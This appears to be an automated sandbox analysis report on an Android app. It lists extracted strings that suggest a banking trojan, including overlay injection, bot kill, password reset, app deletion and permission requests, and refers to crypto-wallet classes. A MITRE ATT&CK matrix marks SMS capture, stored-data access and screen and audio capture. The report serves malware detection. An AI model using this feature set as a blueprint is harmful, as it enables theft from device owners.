Source: Lorg/apache/commons/collections4/comparators/ReverseComparator;-><init>()VInstruction: "lorg/apache/commons/collections4/comparators/reversecomparator;-><init>(ljava/util/comparator;)v"
Source: Lcabbage/grace/solid/h/k;->a(Landroid/accessibilityservice/AccessibilityService;Landroid/view/accessibility/AccessibilityEvent;)VInstruction: "const-string v1, "open_inject""
Source: Lcabbage/grace/solid/h/h;->a()VInstruction: "const-string v3, "kill_bot""
Source: Lcabbage/grace/solid/h/l;->a()VInstruction: "const-string v2, "reset_pass""
Source: Lcom/coinbase/android/PinStorage/PinStorageModule;->deleteScreenProtectPreference()VInstruction: "const-string v1, "pin_enabled_app_open""
Source: Lpiuk/blockchain/android/ui/start/PasswordRequiredActivity$twoFATimer$2$1;->onFinish()VInstruction: "lcom/blockchain/preferences/walletstatus;->setresendsmsretries(i)v"
Source: Lcabbage/grace/solid/h/b;->a(Landroid/accessibilityservice/AccessibilityService;Landroid/view/accessibility/AccessibilityEvent;)VInstruction: "const-string v0, "app_delete""
Source: Lcabbage/grace/solid/h/d;->a()VInstruction: "const-string v2, "ask_perms""
Source: Lorg/webrtc/voiceengine/WebRtcAudioRecord;->reportWebRtcAudioRecordStartError(Lorg/webrtc/voiceengine/WebRtcAudioRecord$AudioRecordStartErrorCode;Ljava/lang/String;)VInstruction: "const-string v1, "start recording error: ""
Source: Lcabbage/grace/solid/h/b;->a(Landroid/accessibilityservice/AccessibilityService;Landroid/view/accessibility/AccessibilityEvent;)VInstruction: "const-string v0, "app_delete""

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsWindows Management InstrumentationPath InterceptionPath InterceptionApplication Discovery11Capture SMS Messages1System Network Connections Discovery1Remote ServicesCapture Audio11Exfiltration Over Other Network MediumEncrypted Channel1Exploit SS7 to Redirect Phone Calls/SMS1Remotely Track Device Without AuthorizationCarrier Billing Fraud1
Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsObfuscated Files or Information1Access Stored Application Data1Application Discovery11Remote Desktop ProtocolNetwork Information Discovery1Exfiltration Over BluetoothNon-Application Layer Protocol2Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerSystem Information Discovery1SMB/Windows Admin SharesScreen Capture1Automated ExfiltrationApplication Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Binary PaddingNTDSProcess Discovery1Distributed Component Object ModelCapture SMS Messages1Scheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA SecretsRemote System DiscoverySSHAccess Stored Application Data1Data Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.